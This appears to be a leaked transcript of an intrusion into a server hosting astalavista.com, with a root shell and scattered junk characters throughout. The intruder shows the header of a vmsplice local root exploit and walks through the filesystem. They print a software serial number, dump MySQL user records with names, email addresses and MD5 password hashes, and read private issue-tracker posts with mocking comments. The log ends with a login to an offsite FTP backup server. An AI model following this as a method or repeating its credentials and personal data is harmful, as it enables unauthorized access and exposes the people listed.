& y* E0 U" W9 }$ ldrwx–x–x 10 com com 4096 Apr 28 12:40 .6 S9 x9 v- |- h" w
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .., q- \: F. i; {1 e( b' L- u6 [' P. e
drwx—— 2 com com 4096 Jun 4 04:04 backups% \3 U( v4 Z1 p; B% `
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
* D& n5 x+ i* `+ B0 N9 Ldrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
( d0 }0 Y& c: [0 H& b* P: B-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
" f) H& L+ w$ Q$ l-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout3 S4 ]$ S6 ^/ e( d; Q
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile# S7 B6 m4 H9 p
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
@# v4 B& s! W3 L, |( T- ?* }drwx–x–x 3 com com 4096 Jan 29 2008 domains
( a8 @: y+ x( F-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
8 z, w# b$ C1 d adrwxrwx— 3 com mail 4096 Jan 6 19:24 imap
! J/ U& z3 ?4 a& j- j-rw——- 1 com com 69 Nov 18 2008 .lesshst: S k# c6 J3 u4 p) l1 ?$ q p& _
drwx—— 2 com com 4096 Sep 24 2007 mail
3 i- C6 A8 D' a T% H) @-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history: z1 v8 H2 s* A7 M4 \* C% B6 u: N
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
: I. k8 }6 B3 H g* l4 r: ^& xlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
4 R# G6 ~# H% g- K0 {; w; }0 d% o-rw-r—– 1 com mail 34 Sep 24 2007 .shadow& b5 r; H$ ?7 S
drwx—— 2 com com 4096 Aug 26 2008 .ssh2 Y/ n/ D: Z4 j2 n/ e4 h0 n
-rwx—— 1 com com 8515 Feb 10 2008 t( F% z: q. q/ {; u' e
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
7 b/ K" F3 G1 Y5 P$ \" P( A0 Sdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
7 Q1 Y( t% |. u5 M0 T* \/ m9 X8 `-rw-rw-r– 1 com com 617 May 20 2008 .toprc+ b4 ~4 ~: I7 N0 M9 m8 C
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
9 B, d* p! a4 d' W9 w* @# g-rw——- 1 com com 16629 Mar 28 21:46 .viminfo- y. z7 K! k5 f2 G5 X1 Y( L% Y' L9 ~
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc& A( ^& X# e! E8 M& S5 \1 Y
, K% A4 N3 Q1 g# c gsh-3.2# head t.c6 A8 U9 B* W- J2 \7 H5 t3 z
/*
- l5 ? s/ |3 P" G* jessica_biel_naked_in_my_bed.c" c, S+ |" u) o& _
*2 r( O5 k: A. r/ t3 G
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.! p B: _) m' r; h. N [
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.' ^4 H6 i" q) `5 i- q M9 {
* Stejnak je to stare jak cyp a aj jakesyk rozbite.2 R4 Z" y+ H' ?4 N0 l7 i* q4 v
*
, s0 |% E7 K/ @+ E7 F& q6 q& U* Linux vmsplice Local Root Exploit
) I6 |" r$ k! L, d" [6 p* By qaaz5 _5 L/ w! z/ }! S& {7 c
*
& K8 F# {2 L' E4 S9 I8 K3 h! q2 C1 h, x' l. T4 J/ b, ^1 v
sh-3.2# cd /7 [! k3 o8 w0 }7 W5 X+ ~
sh-3.2# ls -la
; p9 S9 a1 I M9 v: @% l: Z% ttotal 360; F) c) T$ I4 L$ g" C) v1 B
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. C" R" P( R" p- f/ L3 t' Q
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
6 A( z3 k) C1 Q-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
9 |( C2 s9 z# [2 k-rw——- 1 root root 10240 Jun 3 02:39 aquota.user' w2 L2 a: ?+ x8 A. U" Z4 y6 V+ X
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db- \; _+ M3 L! j9 h% K- x. N
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck8 A) T- p0 s5 d G. i
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel9 m6 E, @, B5 T1 t! p. c$ X
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
2 h. K3 Y$ h" V3 M3 V2 adrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin# ~2 S; c5 _! E$ [3 r
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
7 ]) O% `4 R, Ydrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
$ Q6 X6 S( \; {. hdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
0 v6 u3 T4 p( S* K; y# }drwxr-xr-x 14 root root 4096 Mar 11 17:56 home. n3 {- J b2 ]5 x
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf: T8 {7 ^1 e5 e- H8 g
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
% E$ x" u7 |/ r% {, g1 [6 S8 udrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64% n8 f5 V: Y% M3 Z% k5 ]. T) @8 ?! I* }
drwx—— 2 root root 16384 Sep 11 2007 lost+found1 O6 ]$ Q) Y* B$ m$ p
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media+ J/ @4 x. M7 H2 u4 b* T
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
2 h; ~9 O8 f3 T% P3 R+ P! adrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
0 @4 g3 d c2 U* _* M d* I-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
/ c8 ?8 U6 Q% ~ S5 b0 Ldrwxr-xr-x 2 root root 0 Jun 3 02:43 net
. m* e1 g$ y Z) b Hdrwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
; B2 g, K- \% c9 A" b3 ` o4 bdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc+ |. D( f3 m- I, D" r5 d
drwxr-x— 15 root root 4096 Jun 4 08:40 root
# p) D4 |4 R: [+ ^/ Ldrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
( _6 R7 @+ t: y3 z. W9 tdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux7 }: | p$ S5 W
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
: Z' q' ~$ s6 t+ F( n: ]* Ndrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
7 I3 {7 f4 ^1 A6 k6 Ddrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp0 i5 ^6 K9 ~' C
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
. O* D3 y- _/ y9 H0 Odrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
( ?* H% l' C7 |" ^1 x
( L+ E2 H- ~( X" Csh-3.2# cd opt
: r" j: w( n9 ~" e. lsh-3.2# ls -la
+ ^1 _) R+ R) wtotal 20) \) L3 Y3 l5 n$ b' S
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .
7 @3 b2 n9 D8 L7 {& I+ D3 t9 r6 Fdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .." w5 m2 g/ J4 [. W: k; H
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws- w5 B5 K# f6 i3 k/ R# A
e. |; e7 Q8 e7 e G8 Y2 A5 }sh-3.2# cd lsws/6 T- v3 x9 a! V Z
sh-3.2# ls -la' q# Z! \# n5 d( J% A( H
total 108% X) B, a* F/ Z3 f# M
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
# z7 z/ Z- a' |" V; jdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
2 H; ~3 _, b7 l& g. s* l' ^ Adrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
5 V9 n3 u& g- m$ }drwxr-xr-x 13 root root 4096 May 29 15:10 admin
$ a1 z( z4 J% a0 x- d: e) _0 \3 l Vdrwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
7 v g. |9 y5 pdrwxr-xr-x 2 root root 4096 May 29 15:10 bin
& w, K- M* F5 g; @drwx—— 4 apache apache 4096 Jun 3 02:43 conf
' N, n! X, m6 {drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
; Q" V4 q& [3 ^6 Idrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
8 X, F1 K2 ]! C- b1 Z8 Odrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin3 v8 r2 ~6 n2 Z0 z1 g
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib
2 F+ o, L, h: ~-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
2 i+ D$ z- \& {6 E8 C# [' h-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
8 A% S7 J: u0 K5 `; Y5 R-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL. H4 c# y2 `& }9 p9 d( f( H2 g8 {
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
y) s5 E! B% @drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
$ J% R5 Y' b: I( C8 y8 C* Udrwxr-xr-x 2 root root 4096 Mar 20 2008 php" g Z, i4 C, ?# C" R2 K# C
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild( U! L) L# x- {+ {+ F% z& h. D
drwxr-xr-x 3 root root 4096 Mar 20 2008 share: ~/ W5 d, f8 ]
-rw-r–r– 1 root root 6 May 29 15:10 VERSION" N" R+ Z, b+ m
/ q7 U) J$ G, ksh-3.2# cd conf
$ B! G1 V% D9 Q# v- ysh-3.2# ls -la$ d% D0 i5 w) J3 L$ h) b. ]2 i
total 48
( P0 l3 j: x; z: f8 d2 V) m/ N3 Pdrwx—— 4 apache apache 4096 Jun 3 02:43 .9 [- l( o! Q! \% @; L5 f0 Y
drwxr-xr-x 15 root root 4096 Mar 20 2008 ..: V y. W: W5 ^) y* o
drwx—— 2 apache apache 4096 Mar 20 2008 cert6 f ?9 I9 b( [' p& A; @) r9 E
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
2 d1 H+ }% G2 J I. P% i Q9 ^-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak- x0 q* g+ w. E+ c; v
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
5 l7 T, k2 x+ x k9 Z! F- H1 G-rw——- 1 apache apache 256 May 29 15:10 license.key" u4 j: V5 ]' L
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old" Y: Y6 v; P4 y5 }# [
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
( q' F: K. U/ P+ Y-rw——- 1 apache apache 20 May 29 15:10 serial.no: p& e2 F4 E, @: B! p* F. h( }2 A0 L
drwx—— 2 apache apache 4096 Mar 20 2008 templates
( |* p% C" M/ c7 _8 h5 H; i8 k& B/ n
sh-3.2# cat serial.no
* t4 _5 `/ d5 K- x0 `IbDl-oVsO-CKqL-wVRa
1 ^: d, z/ ~ [ P* F7 V
$ [" e6 b+ g8 F2 R; i8 U% C% k/ [sh-3.2# mysql
* E* o6 @6 k$ q9 R1 }9 E7 \Welcome to the MySQL monitor. Commands end with ; or \g.
- O, O1 G0 E. E* q( Y) tYour MySQL connection id is 286844
) f, L- W/ P, Z3 uServer version: 5.0.45-community-log MySQL Community Edition (GPL)% b" h5 y; d3 \ e
8 V, }, V, F0 l3 h& Q; b5 |
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.9 y- ~/ S3 B' \3 w& F1 o
/ |. F& n/ O6 j6 j+ Y
mysql> show databases;4 { `/ A5 s( \1 m# v- ]
+———————–+- A* s% h; r% b) s% X
| Database |
, W* i3 |4 c" g' q5 I+———————–+) n5 |" |* T; W/ g/ e' ~* X! w0 r
| information_schema |( `9 W1 ^) ]7 {. r0 Q/ q
| astanet_ads |& z; _+ i a* \0 _
| astanet_mailing_lists |
# {& u7 T' P: m6 ]8 I0 I* X. \| astanet_mediawiki |+ P7 c% s; n* N5 b
| astanet_membersystem |
9 l( }# p+ x$ L+ ]% W \| com_contrexx |) T; N. u& @, Z* {2 Y
| com_contrexx2 |9 g) Z& N; t1 [8 @+ F0 \
| com_contrexx2_live |/ U' y9 R& i$ _% r9 `
| da_roundcube |& s7 M4 B, \& t+ ]' E) X7 G# ]: T
| dolphin |
- o2 b- B2 N4 Y| ideapool |
& k2 w% i) z' |6 \" h7 J C$ || mysql |" A3 S8 `$ a1 o1 r4 `0 e$ ~
| test |# ]6 J; n6 g! H P8 q4 t" K
| yourmaster |
" q. F/ l% Y* \! X$ g3 L+———————–+: y! t& L1 m; ~7 O
14 rows in set (0.00 sec)
& n6 }( D9 Z+ \' { F2 F/ y7 H5 D1 S# a
mysql> use ideapool
; B. b- T, }, V$ q5 |" ]Database changed
+ M5 |& j+ f' O. n6 e5 @& Dmysql> show tables;
" r- o% @6 n; w& j6 z( n+———————————–+# [) K! C; o( c# H7 ]
| Tables_in_ideapool |
- ]1 x5 ^8 B5 a0 U5 v4 r+———————————–+
0 l. V+ N) G9 N4 u3 X| eventum_columns_to_display |
/ _& O8 f5 ~4 L" m1 _. k( w$ B| eventum_custom_field |& @/ M) e" z( R3 a
| eventum_custom_field_option |/ y. t) R/ p9 U+ h n
| eventum_custom_filter |. x# W C9 r. b2 ^. w# d# P4 |
| eventum_customer_account_manager |+ t. H& j' v: S
| eventum_customer_note |
/ |$ H0 u; W( y: i# S) s| eventum_email_account |
) z- x3 S8 U5 q* m# d( M| eventum_email_draft |
W2 J( I, a; V- H8 V% v5 ?| eventum_email_draft_recipient |
7 s/ A% ?8 ~/ L, N| eventum_email_response |0 i" }! `* ^2 Q0 l+ t' V* U1 D4 z
| eventum_faq |
" |6 B% p! O1 f1 G7 n& E| eventum_faq_support_level |
, O6 a4 q; s: h. U. |% e| eventum_group |' j5 @& z9 e5 ~, G3 P' i& h b
| eventum_history_type |
0 s3 ^$ F! E9 A Y, X| eventum_irc_notice |
$ c6 Z" t! J; e7 S# g| eventum_issue |7 c0 Y7 z' ~+ W
| eventum_issue_association |7 u3 q& ^( T& p0 n9 R# R1 b
| eventum_issue_attachment |
8 {( S% u8 U9 ?7 [ K| eventum_issue_attachment_file |, N' X9 _" Y6 n6 _& _9 E
| eventum_issue_checkin |
) S& r( I+ T, O. O4 B| eventum_issue_custom_field |6 \8 o* J+ r4 w1 ~2 Z% [! D
| eventum_issue_history |
9 O. t% O) j0 A| eventum_issue_quarantine |5 H+ V0 p9 A# I# a8 i% u/ A- V
| eventum_issue_requirement |
# d4 q* m7 \1 o: j/ G! d| eventum_issue_user |
3 s! p/ c; Q, C: S8 {# q| eventum_issue_user_replier |! L9 |# V- |+ l6 t& g6 l2 Y
| eventum_link_filter |
4 Q7 J- [, A& R$ \6 d& n' s| eventum_mail_queue |
9 N! A4 A( D) Y0 V| eventum_mail_queue_log |9 Y8 [: A1 f" Z! ?) b$ _2 F9 ~. S
| eventum_news |
y) |2 ~9 {- ~( j0 `6 k# x( I| eventum_note |% k' G' c8 ?& O
| eventum_phone_support |0 W6 `/ [: U7 [! D4 i
| eventum_project |# v0 T- y C4 s+ a6 f
| eventum_project_category |
& k" V& S. n, F9 Y/ m6 E R| eventum_project_custom_field |
1 a* H% b2 [" O* ]5 i| eventum_project_email_response |
' n' ^, d. f5 O, H2 f| eventum_project_field_display |
2 V0 B$ b. q9 @8 `+ M/ G& I5 N| eventum_project_group |
4 P/ \3 \5 K/ b. w) I o9 ^6 K| eventum_project_link_filter |' Q7 E, U4 U! B6 @
| eventum_project_news |- K9 ~) `+ X: j: {, g
| eventum_project_phone_category |* \: @4 Y3 Q! |" q
| eventum_project_priority |% p, J: r: u) i+ K0 _5 r: Q7 Y8 g
| eventum_project_release |: b1 k) e+ |+ p3 a$ K
| eventum_project_round_robin |) F) P- o- [' b# q
| eventum_project_status |& z! _$ u- o( z$ y' x4 E& m6 }
| eventum_project_status_date |
, g! t; ]; V7 I) j" f! x| eventum_project_user |
, ^7 N5 I& R+ Z( C: M) k| eventum_reminder_action |
% [, Q- N7 @( h8 k# P+ ?( {# Q6 J| eventum_reminder_action_list |
0 u/ }) x/ q6 U l# [/ W- X3 V| eventum_reminder_action_type |
7 Z/ Q; U8 ^8 b6 `% q| eventum_reminder_field |
- j9 g/ a: Q9 V| eventum_reminder_history |; m8 s o( H, V9 V: U
| eventum_reminder_level |
4 ` p% \$ k( b! j7 `0 M6 Z& B2 {| eventum_reminder_level_condition |
% m, e" @5 D ] J, ~: f| eventum_reminder_operator |; }' r" i5 D) O0 O
| eventum_reminder_priority |" @" ~! B0 }* h9 S6 \* `
| eventum_reminder_requirement |/ e2 C) c1 v8 V2 I) l. v8 I/ _
| eventum_reminder_triggered_action |
4 k: g8 O+ {- K+ R" P$ h2 t5 `1 g| eventum_resolution |
5 R. T4 h5 `( G2 {) `| eventum_round_robin_user |
1 n7 b g) k# [$ h| eventum_search_profile |, ^1 e! q4 F( K; N% Z
| eventum_status |
5 T6 c. c* X& ?* k| eventum_subscription |
0 D: ?2 L$ c; a$ `( ?| eventum_subscription_type |
$ f# u( \! U1 C0 r5 W| eventum_support_email |' X- p8 h4 W$ ]* o H# M& d
| eventum_support_email_body |5 e9 ]7 X/ J2 N7 @, O
| eventum_time_tracking |6 u) e5 j: e( r3 Y+ n7 X" w$ n; d
| eventum_time_tracking_category |
$ \2 S# h- t6 \0 ]7 k8 G, j| eventum_user |+ G6 x4 ^5 X% h# U6 f) [% N% Z
+———————————–+* j/ e( u% A, T
69 rows in set (0.00 sec)! W: Z5 o/ v/ h. I9 }4 V
2 M2 ~ b2 G% `" E9 B* F* q+ ^: Omysql> describe eventum_user;
: D I6 `5 t- d0 }4 m/ Y+————————-+——————+——+—–+———————+—————-+
( l6 Z9 Y/ x& Q( W- N! x3 W! r+ h: S7 M| Field | Type | Null | Key | Default | Extra |
8 @2 P: y, p0 r+ C+————————-+——————+——+—–+———————+—————-+" Q! m; y- R* O! x( R$ H
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
5 X) M/ ^3 ~$ n6 |2 n" h; ^| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
/ q! f0 W8 m y( R- E" [1 N% m. Y| usr_customer_id | int(11) unsigned | YES | | NULL | |9 c5 q/ O% I* [! s1 G
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |6 S' ?' g: P6 ?7 D( [+ J
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
, F$ H% j7 X5 p6 e. T| usr_status | varchar(8) | NO | | active | |
. v; t8 n: b8 W8 T, ~3 w2 p| usr_password | varchar(32) | NO | | | |
$ b, T& ]3 {2 p* q| usr_full_name | varchar(255) | NO | | | |5 Y' @4 b1 x* t) Y
| usr_email | varchar(255) | NO | UNI | | |* w' K8 r* F: a/ E% k
| usr_preferences | longtext | YES | | NULL | |( S4 M/ F( b! q9 D
| usr_sms_email | varchar(255) | YES | | NULL | |
, `; S; H6 `7 I6 x* |* @1 ^4 Q$ N| usr_clocked_in | tinyint(1) | YES | | 0 | |# |0 d# P* ^) \; D5 y' V: f
| usr_lang | varchar(5) | YES | | NULL | |
- D. Y: ~9 t4 h8 O& e0 H+————————-+——————+——+—–+———————+—————-+
/ \0 k4 M+ S" U0 S3 ^13 rows in set (0.00 sec)
2 E( `6 w) w- } Q" P$ z1 r- Y! I3 y8 s
& h) j" M2 T% l! umysql> select usr_full_name,usr_email,usr_password from eventum_user;% h; Q* w6 O5 {
+———————-+——————————-+———————————-+, v3 O e0 t. z9 X0 f/ ?5 s: D; M
| usr_full_name | usr_email | usr_password |* Q* T5 d8 R) g& O6 R" W
+———————-+——————————-+———————————-+5 h# k" ?# v" [( D
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |( n# |" x7 Q# D, b
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
- r9 e2 o. { Y+ x* H| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |2 S6 L, m" }9 U- [
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
( y! V9 O0 m* [| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |8 R4 S: G: i( G# ?
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |7 R5 G4 [2 g+ E" _6 L* l8 o8 z& `
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |0 i$ a' x. t! I4 U. ^
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
6 e( P5 d% `8 S' p$ y| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |7 e5 K+ Z1 i3 G
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |0 S9 E% @" _( q" A; ^$ b
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |$ ]5 w* {: l$ T: y2 o |" s0 {# t
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
; W3 W2 H9 A) b| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
5 }$ c$ ?- a8 H| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
K2 b4 L& \( P3 m& @, G| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
- k8 I1 g! } N m9 D+———————-+——————————-+———————————-+
$ }2 [. R2 d, J$ I$ f. r15 rows in set (0.00 sec)
1 M' G4 \3 _8 v' o* B( D- ` R) S7 `
mysql> select iss_description from eventum_issue where iss_id = 43;
* i5 a5 [0 ^, O. O) L& e+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+8 `/ Q* p! z( F- S) V: _: Z
| iss_description
: ?! _. m1 i8 r! I N" B- l|# C1 s8 a* o7 Y2 c$ _# \' \
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+. s4 Q6 E' m. ] i$ |
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be. f5 E7 J+ ^5 w6 d' ^4 y( D+ k$ M
connected for 90 mins… 120mins… so what i propose is something like:
* }3 G' w, b8 d# k L( ` K链接标记[url]http://www.surfthechannel.com/[/url]' j% `6 |/ ~" J5 d W% B! B
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system- O, J4 O7 k! T! E9 E
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t% \; C/ \" z/ N& e
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
. R/ A4 Q6 O- q- r; Kif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
8 r/ O2 d5 y2 X2 Q" q! P
8 |! q3 z) {- wWe could also put advertisement during play on the flash video player itself… extra $$…. ]. _' X; ~' ~9 \' ` @, g' p
# S* ]! {8 f0 T/ uBy sykadul |2 K& b! F6 f$ Q+ H5 z; v% r
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
$ |% \1 L$ u% `0 d1 row in set (0.00 sec)% T; T) K6 u# p6 v* Y7 b' B
2 B# u5 x( H- n$ f! h) N' D
// Money and extra $$ is all they care about. remember that.2 T7 v& E Y) L. v U
y- f/ I; k: I2 `: P, `mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
: Y* i0 C5 p) _" e! A0 ~% i+————————+——————————————————————————————————————————————————————————————————————————————-+
+ s# I: t) C- t' D1 a) [: D| iss_summary | iss_description
z9 f+ g, `! w7 N% D|. b4 C6 n% h$ S/ `7 T$ H3 _2 R; z
+————————+——————————————————————————————————————————————————————————————————————————————-+
" Z* M/ y/ N* a| Forum for REAL EXPERTS | Hello,
4 v- v/ |9 ]: d' ?6 ?8 Q1 ~( `+ |9 G: a. h
Ishtus and I,
4 l6 E" r) i6 [" W& U5 R$ }6 ~1 L% U7 z5 h' } z
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide+ T/ T5 [ B0 W0 N! A& i' R
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..& j9 s' e9 W6 k0 _5 U( C
/ ?/ @6 G# n! C; D: ~) [9 @/ [/ vOne example a friend of mine from coresecurity.com!- F" ~9 B9 ^' q- p
1 \ g8 m! _2 `6 [" wWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
$ j$ f* G+ ?# c2 _8 ^8 @( y7 P3 c3 V- `: k& |/ d9 k. V1 ~, j
|' C8 |# Y$ G% V; y6 e$ b
+————————+——————————————————————————————————————————————————————————————————————————————+# f0 e4 O( j {8 T+ [* k, Y
1 row in set (0.00 sec), S! ]( A+ a: J" ?2 U; J" M% G
) t# H" Q" g0 [4 G, ~' _, K+ k
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
O: } M p/ b/ R" R6 y$ Z5 E" ^: B$ ?# c
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
7 F: x! T# m. a w! a4 _+——————+———————————————————————————————+
* d3 |4 z# ]8 {: j o* V7 m| iss_summary | iss_description |8 I: v" W5 V9 f2 L/ C
+——————+———————————————————————————————+0 }$ M+ a' O4 d- C
| Website guidance | Virtual Girl which guides you trought the website.& x5 k7 r, [! V1 I$ x2 t( |* Q: U
9 \' Z, g4 z3 a, G9 I3 ZWe need a girl with who you can ( talk )!!!
! k1 i2 D- a7 M7 o: J# L9 TAlso for the News!
) S4 ?2 x$ P* G4 i$ VSo my suggestion is a girl who read you the news loud if you like!
( D1 @4 F2 e; z J1 _ B9 _; xyou can choose between read yourselfe or she read it for you or both!
$ n+ _5 c# I( m; ^! S8 D# ~- F7 Y! F
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
: c8 a; m2 f+ R; {, l* {# ~7 M$ C6 d% @) ?# C
Have a look on the example girls!!
" T7 ]; J) b9 i$ S( h9 a
) E+ d1 g" C6 M' f链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
3 ^. \, K, m' m& n, P) m, l. ^. s( A) O' q. \ e1 r5 f$ f r: c/ O
or that6 |% `2 R' g3 O) ^5 ?2 n D( G. x6 u
4 J5 V( u: q; m d% h: V! d4 V: B
链接标记[url]http://www.yellostrom.de/[/url]
( @& o/ \5 n5 c! v* J3 |- m
2 E/ x$ B1 k1 \; E|
2 q+ c* h( C8 k) T. ^# }1 g+——————+———————————————————————————————++ ?0 B: ]3 N$ I9 O+ j+ K; K
1 row in set (0.00 sec)! r; m3 \5 I, Y& ~$ U
. p7 \& |, C* V' d* Q// ha ha.8 O$ |1 e" ~7 k: n) h! f4 K
' O, \6 K- l$ A3 Z; \9 W+ d
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
# t" c, G3 I' p: ~3 c1 i8 X' K, F+————————–+———————————————————————————————————–+
6 W6 W) [7 `" ^" K| iss_summary | iss_description |
; z( u& K$ }8 R6 x {+————————–+———————————————————————————————————–+4 M, R; n5 @ d1 h5 [+ u
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |6 k1 V9 y( s% z: \+ T
+————————–+———————————————————————————————————–+
( H5 Q6 l2 v2 W% p4 g' W4 l" G6 |1 row in set (0.00 sec)
" Q: ?! C6 o5 s; a- J2 i& }1 o( I+ p
// LOL.) |3 M' z! ^9 ]9 ?, {5 C
; u+ G/ Z5 _( s9 m! _mysql> exit' p9 G1 X0 u; {' q+ v# o; A7 N
Bye
9 A* ]5 [, O2 d) U) f% q2 t1 r! w7 m3 v! t4 c
sh-3.2# ftp 212.254.194.1634 h( I& f2 p, I
Connected to 212.254.194.163.
3 u+ n6 Q2 u. e8 M E220 BackupCOM_VW FTP server ready.
4 c, Y! c3 h$ o& G4 Z504 AUTH: security mechanism ‘GSSAPI’ not supported.5 V, ^' F6 O" J. o! R% r: h/ j
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
3 G; e* W7 M& m) @. E) ^$ |" ~KERBEROS_V4 rejected as an authentication type
0 t. z- A6 k6 Y& r& lName (212.254.194.163:root): astalavista.com
+ z5 }2 S3 l# X/ R331 Password required for astalavista.com.
! h% p! s4 e' J8 M( y. A( b+ E1 xPassword:1 l% E8 V+ J: {9 Q- h, U
230 User astalavista.com logged in.0 V1 @5 G6 c/ h; _# H
Remote system type is UNIX. d. K8 `9 G) A
Using binary mode to transfer files. J. ^5 P' d3 {+ z& O3 R
ftp> ls -la
. E+ `# ~! e4 S+ u2 `$ n227 Entering Passive Mode (212,254,194,163,2,188)" ?1 o2 g0 C) \) b& E
150 Opening BINARY mode data connection for ‘file list’.
, A3 e+ K. q/ U4 I- N$ Adr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
" ^9 H4 f( ~& }, Y" F1 @) T226 Transfer complete.4 ]+ Q: w* Z, \' L. a1 ]4 v
ftp> cd astalavista.com
